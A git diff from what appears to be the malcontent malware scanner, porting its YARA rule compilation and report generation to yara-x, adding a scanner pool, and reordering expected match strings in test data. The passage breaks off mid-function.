"/usr/sbin/httpd/usr/sbin/inetd/usr/sbin/rdate/usr/sbin/tftpd", "/usr/sbin/i2cdetect/usr/sbin/nandwrite/usr/sbin/partprobe/usr/sbin/readahe", "/usr/sbin/i2cdump/usr/sbin/ifplugd/usr/sbin/nologin/usr/sbin/rtcwake/usr/s", "/usr/sbin/i2cget/usr/sbin/i2cset/usr/sbin/rfkill/usr/sbin/svlogd/usr/sbin/", - "/usr/sbin/i2cset/usr/sbin/rfkill/usr/sbin/svlogd/usr/sbin/udhcpd", - "/usr/sbin/i2ctransfer/usr/sbin/load_policy/usr/sbin/readprofile", "/usr/sbin/ifplugd/usr/sbin/nologin/usr/sbin/rtcwake/usr/sbin/setfont/usr/s", "/usr/sbin/killall5/usr/sbin/loadfont/usr/sbin/nanddump/usr/sbin/powertop/u", "/usr/sbin/loadfont/usr/sbin/nanddump/usr/sbin/powertop/usr/sbin/sendmail/u", - "/usr/sbin/lpd/usr/sbin/mim/usr/bin/tree", "/usr/sbin/matchpathcon/usr/sbin/remove-shell/usr/sbin/ubiupdatevolgenerati", "/usr/sbin/nanddump/usr/sbin/powertop/usr/sbin/sendmail/usr/sbin/sestatus/u", "/usr/sbin/nandwrite/usr/sbin/partprobe/usr/sbin/readahead/usr/sbin/setsebo", @@ -1512,16 +1503,21 @@ "/usr/sbin/partprobe/usr/sbin/readahead/usr/sbin/setsebool/usr/sbin/ubiatta", "/usr/sbin/popmaildir/usr/sbin/setenforce/usr/sbin/setlogconsapko-generated", "/usr/sbin/powertop/usr/sbin/sendmail/usr/sbin/sestatus/usr/sbin/ubimkvol/u", - "/usr/sbin/rdev/usr/bin/ascii/usr/bin/crc32/usr/bin/tsortVERSION_ID", "/usr/sbin/readahead/usr/sbin/setsebool/usr/sbin/ubiattach/usr/sbin/ubideta", - "/usr/sbin/remove-shell/usr/sbin/ubiupdatevolgenerating", "/usr/sbin/rtcwake/usr/sbin/setfont/usr/sbin/telnetd/usr/sbin/seedrngPRETTY", "/usr/sbin/sendmail/usr/sbin/sestatus/usr/sbin/ubimkvol/usr/sbin/ubirmvol/u", "/usr/sbin/sestatus/usr/sbin/ubimkvol/usr/sbin/ubirmvol/usr/sbin/ubirsvolge", - "/usr/sbin/setfont/usr/sbin/telnetd/usr/sbin/seedrngPRETTY_NAME", "/usr/sbin/setsebool/usr/sbin/ubiattach/usr/sbin/ubidetach/usr/sbin/ubirena", + "/usr/sbin/rdev/usr/bin/ascii/usr/bin/crc32/usr/bin/tsortVERSION_ID", + "/usr/sbin/i2cset/usr/sbin/rfkill/usr/sbin/svlogd/usr/sbin/udhcpd", + "/usr/sbin/i2ctransfer/usr/sbin/load_policy/usr/sbin/readprofile", + "/usr/sbin/setfont/usr/sbin/telnetd/usr/sbin/seedrngPRETTY_NAME", + "/usr/sbin/ubimkvol/usr/sbin/ubirmvol/usr/sbin/ubirsvolgetting", + "/usr/sbin/httpd/usr/sbin/inetd/usr/sbin/rdate/usr/sbin/tftpd", "/usr/sbin/ubiattach/usr/sbin/ubidetach/usr/sbin/ubirename", - "/usr/sbin/ubimkvol/usr/sbin/ubirmvol/usr/sbin/ubirsvolgetting" + "/usr/sbin/flash_eraseall/usr/sbin/selinuxenabledskipping", + "/usr/sbin/remove-shell/usr/sbin/ubiupdatevolgenerating", + "/usr/sbin/lpd/usr/sbin/mim/usr/bin/tree" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -1532,11 +1528,11 @@ { "Description": "path reference within /var", "MatchStrings": [ - "/var/cache%s", - "/var/cache/apk/etc/apk/worldCalculateWorldcache", "/var/cache/miscAPKINDEX.tar.gzfetchAlpineKeyscfg.MapTo", + "/var/cache/apk/etc/apk/worldCalculateWorldcache", "/var/lib/db/sbomSPDXRef-Package-remote", - "/var/run/docker.sockopen" + "/var/run/docker.sockopen", + "/var/cache%s" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -1628,9 +1624,9 @@ { "Description": "creates temporary files", "MatchStrings": [ - "mktemp", "temp file", - "tmpfile" + "tmpfile", + "mktemp" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -1698,8 +1694,8 @@ "Description": "Uses DNS (Domain Name Service)", "MatchStrings": [ "CNAMEResource", - "SetEDNS0", - "dnsmessage" + "dnsmessage", + "SetEDNS0" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -1745,9 +1741,9 @@ { "Description": "download files", "MatchStrings": [ + "to registrySkip downloading", "DownloadLocation", - "downloadLocation", - "to registrySkip downloading" + "downloadLocation" ], "RiskScore": 2, "RiskLevel": "MEDIUM", @@ -1780,8 +1776,8 @@ { "Description": "accepts binary files via HTTP", "MatchStrings": [ - "Accept", - "application/octet-stream" + "application/octet-stream", + "Accept" ], "RiskScore": 2, "RiskLevel": "MEDIUM", @@ -1841,9 +1837,9 @@ { "Description": "upload content via HTTP form", "MatchStrings": [ - "POST", - "application/json", "application/x-www-form-urlencoded", + "application/json", + "POST", "post" ], "RiskScore": 2, @@ -1855,12 +1851,12 @@ { "Description": "submits content to websites", "MatchStrings": [ - "Content-Type for PUTeach colon", "Content-Type headerdid not find expected alp", - "Content-Type isn", - "Content-Type: text/plain", - "Content-TypeCookie.Valuecontent", "Content-Typenet/http: timeout awaiting respo", + "Content-TypeCookie.Valuecontent", + "Content-Type for PUTeach colon", + "Content-Type: text/plain", + "Content-Type isn", "HTTP", "POST" ], @@ -1885,9 +1881,9 @@ { "Description": "makes HTTP requests", "MatchStrings": [ + "User-Agent", "HTTP/1.", - "Referer", - "User-Agent" + "Referer" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -2074,8 +2070,8 @@ { "Description": "Sends UDP packets", "MatchStrings": [ - "DialUDP", - "WriteMsgUDP" + "WriteMsgUDP", + "DialUDP" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -2086,17 +2082,17 @@ { "Description": "contains embedded HTTPS URLs", "MatchStrings": [ - "https://GoString01234567beEfFgGvsignal", - "https://alpinelinux.org/releases.jsondid", - "https://github.com/chainguard-dev/apkocould", "https://github.com/google/go-containerregistry/issues/377internal", + "https://reproducible-builds.org/docs/source-date-epoch/directory", + "https://index.docker.io/v2/library/ubuntu/tags/list", + "https://github.com/chainguard-dev/apkocould", "https://github.com/spf13/cobra/issues/1279", "https://github.com/spf13/cobra/issues/1508", - "https://index.docker.io/v1/Path", - "https://index.docker.io/v2/library/ubuntu/tags/list", + "https://alpinelinux.org/releases.jsondid", + "https://spdx.org/spdxdocs/apko/directory", + "https://GoString01234567beEfFgGvsignal", "https://pkg.go.dev/text/template", - "https://reproducible-builds.org/docs/source-date-epoch/directory", - "https://spdx.org/spdxdocs/apko/directory" + "https://index.docker.io/v1/Path" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -2207,8 +2203,8 @@ { "Description": "transfer data between file descriptors", "MatchStrings": [ - "sendfile", - "syscall.Sendfile" + "syscall.Sendfile", + "sendfile" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -2265,8 +2261,8 @@ { "Description": "Listen for SIGALRM (timeout) events", "MatchStrings": [ - "ALRM", - "sigaction" + "sigaction", + "ALRM" ], "RiskScore": 0, "RiskLevel": "NONE", @@ -2277,8 +2273,8 @@ { "Description": "Listen for SIGHUP (hangup) events", "MatchStrings": [ - "HUP", - "sigaction" + "sigaction", + "HUP" ], "RiskScore": 0, "RiskLevel": "NONE", @@ -2289,8 +2285,8 @@ { "Description": "Listen for SIGINT (ctrl-C) events", "MatchStrings": [ - "SIGINT", - "sigaction" + "sigaction", + "SIGINT" ], "RiskScore": 0, "RiskLevel": "NONE", @@ -2301,8 +2297,8 @@ { "Description": "Listen for SIGQUIT (kill) events", "MatchStrings": [ - "QUIT", - "sigaction" + "sigaction", + "QUIT" ], "RiskScore": 0, "RiskLevel": "NONE", @@ -2313,8 +2309,8 @@ { "Description": "Listen for SIGWINCH (terminal window change) events", "MatchStrings": [ - "WINCH", - "sigaction" + "sigaction", + "WINCH" ], "RiskScore": 0, "RiskLevel": "NONE", @@ -2470,8 +2466,8 @@ { "Description": "gets very excited", "MatchStrings": [ - "does not work!!!", - "ontain alphanumerical characters onlyexplicitly tagged !!" + "ontain alphanumerical characters onlyexplicitly tagged !!", + "does not work!!!" ], "RiskScore": 2, "RiskLevel": "MEDIUM", diff --git a/pkg/compile/compile.go b/pkg/compile/compile.go index c945c1acf..ec5d026aa 100644 --- a/pkg/compile/compile.go +++ b/pkg/compile/compile.go @@ -8,11 +8,13 @@ import ( "fmt" "io/fs" "path/filepath" + "regexp" "strings" "github.com/chainguard-dev/clog" "github.com/chainguard-dev/malcontent/rules" - "github.com/hillu/go-yara/v4" + + yarax "github.com/VirusTotal/yara-x/go" ) var FS = rules.FS @@ -69,6 +71,9 @@ var badRules = map[string]bool{ "malware_shellcode_hash": true, // bartblaze "Rclone": true, + // Rules that are incompatible with yara-x (unescaped braces in regex strings) + "RTF_Header_Obfuscation": true, + "RTF_File_Malformed_Header": true, } // rulesWithWarnings determines what to do with rules that have known warnings: true=keep, false=disable. @@ -115,13 +120,52 @@ var rulesWithWarnings = map[string]bool{ "hardcoded_host_port_over_10k": true, } -func Recursive(ctx context.Context, fss []fs.FS) (*yara.Rules, error) { - logger := clog.FromContext(ctx) - yc, err := yara.NewCompiler() +var ( + rulePattern = regexp.MustCompile(`(?sm)^\s*rule\s+(%s)\s*(?::\s*[^\n{]+)?\s*{.*?^\s*}\s*$`) + newlinePattern = regexp.MustCompile(`\n{3,}`) +) + +// getRulesToRemove returns a consolidated list of rules to remove from a rule string. +func getRulesToRemove() []string { + rr := make([]string, 0) + // Add rules from badRules map that are marked true + for rule, remove := range badRules { + if remove { + rr = append(rr, rule) + } + } + // Add rules from rulesWithWarnings map that are marked false + for rule, keep := range rulesWithWarnings { + if !keep { + rr = append(rr, rule) + } + } + return rr +} + +// removeRules removes rule matches from the file data. +func removeRules(data []byte, rulesToRemove []string) []byte { + modified := data + ruleNames := make([]string, len(rulesToRemove)) + for i, name := range rulesToRemove { + ruleNames[i] = regexp.QuoteMeta(name) + } + pattern := regexp.MustCompile(fmt.Sprintf( + rulePattern.String(), + strings.Join(ruleNames, "|"), + )) + modified = pattern.ReplaceAll(modified, []byte{}) + return newlinePattern.ReplaceAll(modified, []byte("\n\n")) +} + +func Recursive(ctx context.Context, fss []fs.FS) (*yarax.Rules, error) { + yxc, err := yarax.NewCompiler() if err != nil { - return nil, fmt.Errorf("yara compiler: %w", err) + return nil, fmt.Errorf("yarax compiler: %w", err) } + rulesToRemove := getRulesToRemove() + for _, root := range fss { err = fs.WalkDir(root, ".", func(path string, d fs.DirEntry, err error) error { if err != nil { @@ -134,7 +178,10 @@ func Recursive(ctx context.Context, fss []fs.FS) (*yara.Rules, error) { return fmt.Errorf("readfile: %w", err) } - if err := yc.AddString(string(bs), path); err != nil { + bs = removeRules(bs, rulesToRemove) + + yxc.NewNamespace(path) + if err := yxc.AddSource(string(bs), yarax.WithOrigin(path)); err != nil { return fmt.Errorf("failed to parse %s: %v", path, err) } } @@ -150,56 +197,17 @@ func Recursive(ctx context.Context, fss []fs.FS) (*yara.Rules, error) { return nil, err } - warnings := map[string]string{} - for _, ycw := range yc.Warnings { - clog.WarnContextf(ctx, "warning in %s line %d: %s", ycw.Filename, ycw.Line, ycw.Text) - if ycw.Rule == "" { - continue - } - parts := strings.Split(ycw.Rule, ".") - id := parts[len(parts)-1] - warnings[id] = ycw.Text - } - errors := []string{} - for _, yce := range yc.Errors { - logger.With("line", yce.Line, "filename", yce.Filename).Errorf("error: %s", yce.Text) - if yce.Rule != "" { - logger.With("rule", yce.Rule).Error("defective rule") - } + for _, yce := range yxc.Errors() { + clog.ErrorContext(ctx, "error", yce.Error()) errors = append(errors, yce.Text) } + if len(errors) > 0 { return nil, fmt.Errorf("compile errors encountered: %v", errors) } - rs, err := yc.GetRules() - if err != nil { - return nil, err - } - for _, r := range rs.GetRules() { - id := r.Identifier() - if badRules[id] { - r.Disable() - } - - warning := warnings[id] - if warning == "" { - continue - } - - // use rule name instead of filename to lower maintenance in the face of renames - keep, known := rulesWithWarnings[id] - if keep { - continue - } - if !known { - logger.With("namespace", r.Namespace(), "id", id).Errorf("disabled due to unexpected warning: %s", warnings[id]) - } else { - logger.With("namespace", r.Namespace(), "id", id).Infof("disabled due to expected warning: %s", warnings[id]) - } - r.Disable() - } + yrs := yxc.Build() - return rs, nil + return yrs, nil } diff --git a/pkg/malcontent/malcontent.go b/pkg/malcontent/malcontent.go index 49319b0e4..9916e9207 100644 --- a/pkg/malcontent/malcontent.go +++ b/pkg/malcontent/malcontent.go @@ -5,11 +5,14 @@ package malcontent import ( "context" + "fmt" "io" "io/fs" "sync" + "sync/atomic" + "time" - "github.com/hillu/go-yara/v4" + yarax "github.com/VirusTotal/yara-x/go" orderedmap "github.com/wk8/go-ordered-map/v2" ) @@ -38,9 +41,10 @@ type Config struct { QuantityIncreasesRisk bool Renderer Renderer RuleFS []fs.FS - Rules *yara.Rules + Rules *yarax.Rules Scan bool ScanPaths []string + ScannerPool *ScannerPool Stats bool TrimPrefixes []string } @@ -143,3 +147,134 @@ type CombinedReport struct { RemovedFR *FileReport Score float64 } + +// ScannerPool manages a limited pool of YARA scanners. +type ScannerPool struct { + mu sync.Mutex + rules *yarax.Rules + scanners []*yarax.Scanner + available chan *yarax.Scanner + maxScanners int32 + currentCount int32 +} + +// NewScannerPool creates a new scanner pool with a maximum number of scanners. +func NewScannerPool(rules *yarax.Rules, maxScanners int) (*ScannerPool, error) { + if rules == nil { + return nil, fmt.Errorf("rules cannot be nil") + } + if maxScanners < 1 { + maxScanners = 1 + } + + // Validate rules + testScanner := yarax.NewScanner(rules) + if testScanner == nil { + return nil, fmt.Errorf("failed to create initial scanner") + } + + // #nosec G115 // ignore converting int to int32 + pool := &ScannerPool{ + rules: rules, + available: make(chan *yarax.Scanner, maxScanners), + maxScanners: int32(maxScanners), + scanners: make([]*yarax.Scanner, 0, maxScanners), + } + + // Add the validated scanner to the pool + pool.scanners = append(pool.scanners, testScanner) + pool.available <- testScanner + atomic.StoreInt32(&pool.currentCount, 1) + + return pool, nil +} + +// createScanner creates a new yarax scanner. +func (p *ScannerPool) createScanner() (*yarax.Scanner, error) { + if p.rules == nil { + return nil, fmt.Errorf("rules not initialized") + } + + scanner := yarax.NewScanner(p.rules) + if scanner == nil { + return nil, fmt.Errorf("failed to create new scanner") + } + return scanner, nil +} + +// Get retrieves a scanner from the pool or creates a new one if necessary. +func (p *ScannerPool) Get() (*yarax.Scanner, error) { + // Try to get an available scanner + select { + case scanner := <-p.available: + if scanner == nil { + return nil, fmt.Errorf("received nil scanner from pool") + } + return scanner, nil + default: + p.mu.Lock() + current := atomic.LoadInt32(&p.currentCount) + if current < p.maxScanners { + scanner, err := p.createScanner() + if err != nil { + p.mu.Unlock() + return nil, fmt.Errorf("create scanner: %w", err) + } + p.scanners = append(p.scanners, scanner) + atomic.AddInt32(&p.currentCount, 1) + p.mu.Unlock() + return scanner, nil + } + p.mu.Unlock() + + select { + case scanner := <-p.available: + if scanner == nil { + return nil, fmt.Errorf("received nil scanner from pool") + } + return scanner, nil + case <-time.After(30 * time.Second): + return nil, fmt.Errorf("timeout waiting for available scanner") + } + } +} + +// Put returns a scanner to the pool. +func (p *ScannerPool) Put(scanner *yarax.Scanner) { + if scanner == nil { + return + } + select { + case p.available <- scanner: + default: + scanner.Destroy() + atomic.AddInt32(&p.currentCount, -1) + } +} + +// Cleanup destroys all scanners in the pool. +func (p *ScannerPool) Cleanup() { + p.mu.Lock() + defer p.mu.Unlock() + + close(p.available) + + for scanner := range p.available { + if scanner != nil { + scanner.Destroy() + } + } + + for _, scanner := range p.scanners { + if scanner != nil { + scanner.Destroy() + } + } + + p.scanners = nil + atomic.StoreInt32(&p.currentCount, 0) +} + +func (p *ScannerPool) Stats() (int32, int32) { + return atomic.LoadInt32(&p.currentCount), p.maxScanners +} diff --git a/pkg/refresh/action.go b/pkg/refresh/action.go index 33cfd4b40..db4dd06f1 100644 --- a/pkg/refresh/action.go +++ b/pkg/refresh/action.go @@ -6,6 +6,7 @@ import ( "io/fs" "os" "path/filepath" + "runtime" "github.com/chainguard-dev/malcontent/pkg/action" "github.com/chainguard-dev/malcontent/pkg/malcontent" @@ -77,6 +78,16 @@ func actionRefresh(ctx context.Context) ([]TestData, error) { TrimPrefixes: []string{"pkg/action/"}, } + var pool *malcontent.ScannerPool + if c.ScannerPool == nil { + pool, err = malcontent.NewScannerPool(yrs, runtime.NumCPU()) + if err != nil { + return nil, err + } + } + + c.ScannerPool = pool + testData = append(testData, TestData{ Config: c, OutputPath: output, diff --git a/pkg/refresh/diff.go b/pkg/refresh/diff.go index 127e37b3d..dd9bd0000 100644 --- a/pkg/refresh/diff.go +++ b/pkg/refresh/diff.go @@ -6,6 +6,7 @@ import ( "io/fs" "os" "path/filepath" + "runtime" "github.com/chainguard-dev/malcontent/pkg/action" "github.com/chainguard-dev/malcontent/pkg/malcontent" @@ -203,6 +204,16 @@ func diffRefresh(ctx context.Context, rc Config) ([]TestData, error) { TrimPrefixes: []string{rc.SamplesPath}, } + var pool *malcontent.ScannerPool + if c.ScannerPool == nil { + pool, err = malcontent.NewScannerPool(yrs, runtime.NumCPU()) + if err != nil { + return nil, err + } + } + + c.ScannerPool = pool + testData = append(testData, TestData{ Config: c, OutputPath: output, diff --git a/pkg/refresh/refresh.go b/pkg/refresh/refresh.go index 7a5f0b4aa..f0af33895 100644 --- a/pkg/refresh/refresh.go +++ b/pkg/refresh/refresh.go @@ -6,6 +6,7 @@ import ( "io/fs" "os" "path/filepath" + "runtime" "strings" "sync" @@ -132,6 +133,16 @@ func prepareRefresh(ctx context.Context, rc Config) ([]TestData, error) { c.Renderer = r c.Rules = yrs + var pool *malcontent.ScannerPool + if c.ScannerPool == nil { + pool, err = malcontent.NewScannerPool(yrs, runtime.NumCPU()) + if err != nil { + return nil, err + } + } + + c.ScannerPool = pool + if strings.HasSuffix(data, ".mdiff") || strings.HasSuffix(data, ".sdiff") { dirPath := filepath.Dir(sample) files, err := os.ReadDir(dirPath) @@ -180,8 +191,6 @@ func executeRefresh(ctx context.Context, testData []TestData) error { case <-ctx.Done(): return ctx.Err() default: - defer mu.Unlock() - var err error var res *malcontent.Report @@ -200,6 +209,7 @@ func executeRefresh(ctx context.Context, testData []TestData) error { } mu.Lock() + defer mu.Unlock() completed++ fmt.Printf("\rSample data refreshed: %d/%d (progress/total)", completed, total) diff --git a/pkg/report/report.go b/pkg/report/report.go index 2399bf9c2..fb906a05f 100644 --- a/pkg/report/report.go +++ b/pkg/report/report.go @@ -7,20 +7,18 @@ import ( "context" "crypto/sha256" "fmt" - "io" "net/url" - "os" "path/filepath" "regexp" "slices" "sort" "strconv" "strings" - "unicode" "github.com/chainguard-dev/clog" "github.com/chainguard-dev/malcontent/pkg/malcontent" - "github.com/hillu/go-yara/v4" + + yarax "github.com/VirusTotal/yara-x/go" ) const NAME string = "malcontent" @@ -80,20 +78,12 @@ var yaraForgeJunkWords = map[string]bool{ "YARAForge": true, } -// thirdPartyCriticalSources are 3P sources that default to critical. -var thirdPartyCriticalSources = map[string]bool{ - "YARAForge": true, - "huntress": true, - "bartblaze": true, - "JPCERT": true, -} - // authorWithURLRe matches "Arnim Rupp (https://github.com/ruppde)" -var authorWithURLRe = regexp.MustCompile(`(.*?) \((http.*)\)`) - -var threatHuntingKeywordRe = regexp.MustCompile(`Detection patterns for the tool '(.*)' taken from the ThreatHunting-Keywords github project`) - -var dateRe = regexp.MustCompile(`[a-z]{3}\d{1,2}`) +var ( + authorWithURLRe = regexp.MustCompile(`(.*?) \((http.*)\)`) + threatHuntingKeywordRe = regexp.MustCompile(`Detection patterns for the tool '(.*)' taken from the ThreatHunting-Keywords github project`) + dateRe = regexp.MustCompile(`[a-z]{3}\d{1,2}`) +) // Map to handle RiskLevel -> RiskScore conversions. var Levels = map[string]int{ @@ -112,8 +102,11 @@ var Levels = map[string]int{ func thirdPartyKey(path string, rule string) string { // include the directory - pathParts := strings.Split(path, "/") - subDir := pathParts[slices.Index(pathParts, "yara")+1] + yaraIndex := strings.Index(path, "yara/") + if yaraIndex == -1 { + return "" + } + subDir := path[yaraIndex+5 : strings.IndexByte(path[yaraIndex+5:], '/')+yaraIndex+5] words := []string{subDir} // ELASTIC_Linux_Trojan_Gafgyt_E4A1982B @@ -215,14 +208,17 @@ func behaviorRisk(ns string, rule string, tags []string) int { risk = 3 src := strings.Split(ns, "/")[1] - if thirdPartyCriticalSources[src] { + switch src { + case "JPCERT", "YARAForge", "bartblaze", "huntress": risk = 4 - if strings.Contains(strings.ToLower(ns), "generic") || strings.Contains(strings.ToLower(rule), "generic") { + if strings.Contains(strings.ToLower(ns), "generic") || + strings.Contains(strings.ToLower(rule), "generic") { risk = 3 } } - if strings.Contains(strings.ToLower(ns), "keyword") || strings.Contains(strings.ToLower(rule), "keyword") { + if strings.Contains(strings.ToLower(ns), "keyword") || + strings.Contains(strings.ToLower(rule), "keyword") { risk = 2 } } @@ -233,95 +229,95 @@ func behaviorRisk(ns string, rule string, tags []string) int { for _, tag := range tags { if r, ok := Levels[tag]; ok { - risk = r - break + return r } } return risk } -func unprintableString(s string) bool { - for _, r := range s { - if !unicode.IsPrint(r) { - return true - } - } - return false -} - func longestUnique(raw []string) []string { - var longest []string + longest := make([]string, 0, len(raw)) + seen := make(map[string]bool, len(raw)) - // inefficiently remove substring matches - for _, s := range slices.Compact(raw) { - if s == "" { + sort.Slice(raw, func(i, j int) bool { + return len(raw[i]) > len(raw[j]) + }) + + for _, s := range raw { + if s == "" || seen[s] { continue } - isLongest := true - for _, o := range raw { - if o != s && strings.Contains(o, s) { + for _, o := range longest { + if strings.Contains(o, s) { isLongest = false break } } if isLongest { longest = append(longest, s) + seen[s] = true } } return longest } -func matchToString(ruleName string, m yara.MatchString) string { - s := string(m.Data) +func matchToString(ruleName string, m string) string { + if containsUnprintable([]byte(m)) { + return ruleName + } + switch { - case strings.Contains(ruleName, "base64") && !strings.Contains(s, "base64"): - s = fmt.Sprintf("%s::%s", s, m.Name) - case strings.Contains(ruleName, "xor") && !strings.Contains(s, "xor"): - s = fmt.Sprintf("%s::%s", s, m.Name) - case unprintableString(s): - s = m.Name - // bad hack, can we do this in YARA? - case strings.Contains(m.Name, "xml_key_val"): - s = strings.ReplaceAll(strings.ReplaceAll(s, "", ""), "", "") - } - return strings.TrimSpace(s) + case strings.Contains(ruleName, "base64"), + strings.Contains(ruleName, "xor"): + return ruleName + "::" + m + case strings.Contains(ruleName, "xml_key_val"): + return strings.TrimSpace(strings.ReplaceAll( + strings.ReplaceAll(m, "", ""), + "", "", + )) + } + return strings.TrimSpace(m) } // extract match strings. -func matchStrings(ruleName string, ms []yara.MatchString) []string { - raw := make([]string, 0, len(ms)) +func matchStrings(ruleName string, ms []string) []string { + if len(ms) == 0 { + return nil + } + raw := make([]string, 0, len(ms)) for _, m := range ms { - raw = append(raw, matchToString(ruleName, m)) + str := matchToString(ruleName, m) + if str != "" { + raw = append(raw, str) + } } - slices.Sort(raw) + sort.Slice(raw, func(i, j int) bool { + if len(raw[i]) != len(raw[j]) { + return len(raw[i]) > len(raw[j]) + } + return raw[i] < raw[j] + }) + return longestUnique(raw) } -func sizeAndChecksum(path string) (int64, string, error) { - s, err := os.Stat(path) - if err != nil { - return -1, "", err - } +// sizeAndChecksum calculates size and checksum using already-read file contents if available. +func sizeAndChecksum(fc []byte) (int64, string) { + var checksum string + var size int64 - size := s.Size() - - f, err := os.Open(path) - if err != nil { - return size, "", err - } - - defer f.Close() - - h := sha256.New() - if _, err := io.Copy(h, f); err != nil { - return size, "", err + if len(fc) > 0 { + size = int64(len(fc)) + h := sha256.New() + h.Write(fc) + checksum = fmt.Sprintf("%x", h.Sum(nil)) } - return size, fmt.Sprintf("%x", h.Sum(nil)), nil + return size, checksum } // fixURL fixes badly formed URLs. @@ -357,21 +353,18 @@ func TrimPrefixes(path string, prefixes []string) string { return path } -//nolint:cyclop // ignore complexity of 44 -func Generate(ctx context.Context, path string, mrs yara.MatchRules, c malcontent.Config, expath string, _ *clog.Logger) (malcontent.FileReport, error) { +//nolint:cyclop // ignore complexity of 64 +func Generate(ctx context.Context, path string, mrs *yarax.ScanResults, c malcontent.Config, expath string, _ *clog.Logger, fc []byte) (malcontent.FileReport, error) { ignoreTags := c.IgnoreTags minScore := c.MinRisk ignoreSelf := c.IgnoreSelf - ignore := map[string]bool{} + ignore := make(map[string]bool, len(ignoreTags)) for _, t := range ignoreTags { ignore[t] = true } - size, checksum, err := sizeAndChecksum(path) - if err != nil { - return malcontent.FileReport{}, err - } + size, checksum := sizeAndChecksum(fc) displayPath := path if c.OCI { @@ -381,24 +374,25 @@ func Generate(ctx context.Context, path string, mrs yara.MatchRules, c malconten displayPath = TrimPrefixes(displayPath, c.TrimPrefixes) } + matchCount := len(mrs.MatchingRules()) fr := malcontent.FileReport{ Path: displayPath, SHA256: checksum, Size: size, - Meta: map[string]string{}, - Behaviors: []*malcontent.Behavior{}, - Overrides: []*malcontent.Behavior{}, + Meta: make(map[string]string, matchCount), + Behaviors: make([]*malcontent.Behavior, 0, matchCount), + Overrides: make([]*malcontent.Behavior, 0, matchCount), } - var pledges []string - var caps []string - var syscalls []string + pledges := make([]string, 0, 8) + caps := make([]string, 0, 8) + syscalls := make([]string, 0, 16) ignoreMalcontent := false key := "" overallRiskScore := 0 risk := 0 - riskCounts := map[int]int{} + riskCounts := make(map[int]int, 0) // If we're running a scan, only diplay findings of the highest risk // Return an empty file report if the highest risk is medium or lower @@ -411,25 +405,25 @@ func Generate(ctx context.Context, path string, mrs yara.MatchRules, c malconten } // Store match rules in a map for future override operations - mrsMap := make(map[string]yara.MatchRule, len(mrs)) - for _, m := range mrs { - mrsMap[m.Rule] = m + mrsMap := make(map[string]*yarax.Rule, len(mrs.MatchingRules())) + for _, m := range mrs.MatchingRules() { + mrsMap[m.Identifier()] = m } - for _, m := range mrs { + for _, m := range mrs.MatchingRules() { override := false - if all(m.Rule == NAME, ignoreSelf) { + if all(m.Identifier() == NAME, ignoreSelf) { ignoreMalcontent = true } - for _, t := range m.Tags { + for _, t := range m.Tags() { if t == "override" { override = true break } } - risk = behaviorRisk(m.Namespace, m.Rule, m.Tags) + risk = behaviorRisk(m.Namespace(), m.Identifier(), m.Tags()) if risk > overallRiskScore { overallRiskScore = risk } @@ -446,24 +440,32 @@ func Generate(ctx context.Context, path string, mrs yara.MatchRules, c malconten case c.Scan && risk < highestRisk && !ignoreMalcontent && !override: continue } - key = generateKey(m.Namespace, m.Rule) - ruleURL := generateRuleURL(m.Namespace, m.Rule) + + key = generateKey(m.Namespace(), m.Identifier()) + ruleURL := generateRuleURL(m.Namespace(), m.Identifier()) + matches := make([]yarax.Match, 0, len(m.Patterns())*32) + for _, p := range m.Patterns() { + matches = append(matches, p.Matches()...) + } + + processor := newMatchProcessor(fc, matches) + matchedStrings := processor.process() b := &malcontent.Behavior{ ID: key, - MatchStrings: matchStrings(m.Rule, m.Strings), + MatchStrings: matchStrings(m.Identifier(), matchedStrings), RiskLevel: RiskLevels[risk], RiskScore: risk, - RuleName: m.Rule, + RuleName: m.Identifier(), RuleURL: ruleURL, } k := "" v := "" - for _, meta := range m.Metas { - k = meta.Identifier - v = fmt.Sprintf("%s", meta.Value) + for _, meta := range m.Metadata() { + k = meta.Identifier() + v = fmt.Sprintf("%s", meta.Value()) // Empty data is unusual, so just ignore it. if k == "" || v == "" { continue @@ -548,14 +550,14 @@ func Generate(ctx context.Context, path string, mrs yara.MatchRules, c malconten continue } - if ignoreMatch(m.Tags, ignore) { + if ignoreMatch(m.Tags(), ignore) { fr.FilteredBehaviors++ continue } // If the rule does not have a description, make one up based on the rule name if b.Description == "" { - b.Description = strings.ReplaceAll(m.Rule, "_", " ") + b.Description = strings.ReplaceAll(m.Identifier(), "_", " ") } existingIndex := -1 @@ -679,14 +681,14 @@ func all(conditions ...bool) bool { } // highestMatchRisk returns the highest risk score from a slice of MatchRules. -func highestMatchRisk(mrs yara.MatchRules) int { - if len(mrs) == 0 { +func highestMatchRisk(mrs *yarax.ScanResults) int { + if len(mrs.MatchingRules()) == 0 { return 0 } highestRisk := 0 - for _, m := range mrs { - risk := behaviorRisk(m.Namespace, m.Rule, m.Tags) + for _, m := range mrs.MatchingRules() { + risk := behaviorRisk(m.Namespace(), m.Identifier(), m.Tags()) if risk > highestRisk { highestRisk = risk } diff --git a/pkg/report/report_test.go b/pkg/report/report_test.go index 371dd7d5a..71fa24b78 100644 --- a/pkg/report/report_test.go +++ b/pkg/report/report_test.go @@ -15,12 +15,12 @@ func TestLongestUnique(t *testing.T) { { name: "Test 1", raw: []string{"apple", "banana", "cherry", "applecherry", "bananaapple", "cherrybanana"}, - want: []string{"applecherry", "bananaapple", "cherrybanana"}, + want: []string{"cherrybanana", "applecherry", "bananaapple"}, }, { name: "Test 2", raw: []string{"test", "testing", "tester", "testest"}, - want: []string{"testing", "tester", "testest"}, + want: []string{"testing", "testest", "tester"}, }, { name: "Test 3", diff --git a/pkg/report/strings.go b/pkg/report/strings.go new file mode 100644 index 000000000..b81fb4d51 --- /dev/null +++ b/pkg/report/strings.go @@ -0,0 +1,134 @@ +package report + +import ( + "sync" + + yarax "github.com/VirusTotal/yara-x/go" +) + +// Number of strings to process at any given time. +const batchSize = 4096 + +// StringPool holds data to handle string interning. +type StringPool struct { + sync.RWMutex + strings map[string]string +} + +// NewStringPool creates a new string pool. +func NewStringPool(length int) *StringPool { + return &StringPool{ + strings: make(map[string]string, length), + } +} + +// Intern returns an interned version of the input string. +func (sp *StringPool) Intern(s string) string { + sp.RLock() + if interned, ok := sp.strings[s]; ok { + sp.RUnlock() + return 